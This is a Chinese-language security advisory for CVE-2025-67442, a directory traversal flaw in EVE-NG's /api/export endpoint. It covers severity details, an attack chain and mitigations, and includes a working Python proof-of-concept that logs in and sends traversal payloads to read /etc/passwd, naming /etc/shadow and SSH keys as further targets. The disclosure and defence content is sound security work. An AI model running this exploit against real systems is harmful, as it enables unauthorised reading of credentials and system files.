CVE-2025-67442 EVE-NG目录遍历漏洞

漏洞信息

漏洞编号

CVE-2025-67442

漏洞类型

目录遍历

CVSS评分

7.6 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

EVE-NG 6.4.0-13-PRO

漏洞概述

EVE-NG是一款功能强大的网络拓扑模拟工具，广泛应用于网络工程教学、实验和认证考试准备中。该工具支持模拟多种网络设备，包括Cisco、Juniper、华为等主流厂商的路由器和交换机。漏洞存在于EVE-NG 6.4.0-13-PRO版本的/api/export接口中，该接口设计用于导出实验室(lab)文件供用户备份或共享使用。问题在于该接口在处理用户提交的file_path参数时缺乏有效的输入验证和路径过滤机制，允许攻击者通过路径穿越字符（如../）访问服务器上的任意文件。成功利用此漏洞，认证用户可以读取服务器敏感文件，包括配置文件、密码文件、系统日志等，进而可能导致横向移动和权限提升。由于该接口需要认证，低权限用户即可发起攻击，降低了利用门槛。

技术细节

该漏洞属于经典的目录遍历（Path Traversal）安全缺陷。在Web应用的/api/export端点实现中，程序接收用户输入的file_path参数后，未对路径进行规范化（canonicalization）和安全验证就直接用于文件读取操作。攻击者可以利用路径穿越序列（如../../../etc/passwd或....//....//....//etc/passwd）绕过基础的黑名单过滤。漏洞代码可能类似：readfile($user_input_path)，直接将用户输入拼接到文件路径中。EVE-NG作为以Debian/Ubuntu为基础的系统，常见的敏感目标文件包括/etc/passwd、/etc/shadow、/opt/unetlab/scripts/cfg2json.py等配置文件。攻击者通过构造特定的路径参数，可突破web根目录限制，读取服务器任意位置的文件内容。防御的关键是在读取文件前调用realpath()函数验证最终路径是否在允许目录内，并过滤所有路径穿越字符。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标EVE-NG版本为6.4.0-13-PRO，确认/api/export接口存在且需要认证

STEP 2

Authentication

攻击者使用低权限账号登录EVE-NG获取有效会话token，或利用已有账号访问系统

STEP 3

Payload Crafting

攻击者构造目录遍历payload，使用路径穿越序列如../../../etc/passwd绕过路径过滤

STEP 4

Exploitation

通过/api/export?type=lab&path=../../../etc/passwd等请求，触发文件读取操作

STEP 5

Data Exfiltration

成功读取/etc/passwd、配置文件、SSH密钥等敏感信息，可能进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-67442 PoC - EVE-NG Directory Traversal
# Target: EVE-NG 6.4.0-13-PRO
# Endpoint: /api/export

def exploit_cve_2025_67442(target_url, username, password):
    """
    Exploit for EVE-NG Directory Traversal vulnerability
    Target: /api/export endpoint
    Authentication required: Low privilege user
    """
    login_url = f"{target_url}/api/auth/login"
    export_url = f"{target_url}/api/export"
    
    # Step 1: Authenticate and get session
    session = requests.Session()
    login_data = {
        "username": username,
        "password": password
    }
    
    try:
        login_response = session.post(login_url, json=login_data, verify=False, timeout=10)
        if login_response.status_code != 200:
            print("[-] Authentication failed")
            return None
        print("[+] Authentication successful")
        
        # Step 2: Directory Traversal attack to read sensitive files
        # Read /etc/passwd file
        traversal_paths = [
            "../../../etc/passwd",
            "....//....//....//etc/passwd",
            "..\..\..\etc\passwd"
        ]
        
        for path in traversal_paths:
            payload = {
                "type": "lab",
                "path": path
            }
            
            print(f"[*] Trying path: {path}")
            response = session.get(export_url, params=payload, verify=False, timeout=10)
            
            if response.status_code == 200 and "root:" in response.text:
                print("[+] SUCCESS! File content retrieved:")
                print(response.text[:500])
                return response.text
            elif response.status_code == 200 and len(response.text) > 0:
                print(f"[+] Partial success - got {len(response.text)} bytes")
                print(response.text[:200])
        
        print("[-] Exploitation failed - no valid path found")
        return None
        
    except requests.exceptions.RequestException as e:
        print(f"[-] Request error: {e}")
        return None

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python cve_2025_67442.py <target_url> <username> <password>")
        print("Example: python cve_2025_67442.py https://eve-ng.local admin eve")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    
    exploit_cve_2025_67442(target, user, pwd)

影响范围

EVE-NG 6.4.0-13-PRO

防御指南

临时缓解措施

在官方补丁发布前，可通过Web应用防火墙（WAF）规则临时拦截包含路径穿越字符的请求；限制低权限用户对/api/export接口的访问；禁用不必要的文件导出功能；加强会话管理和监控异常文件访问行为。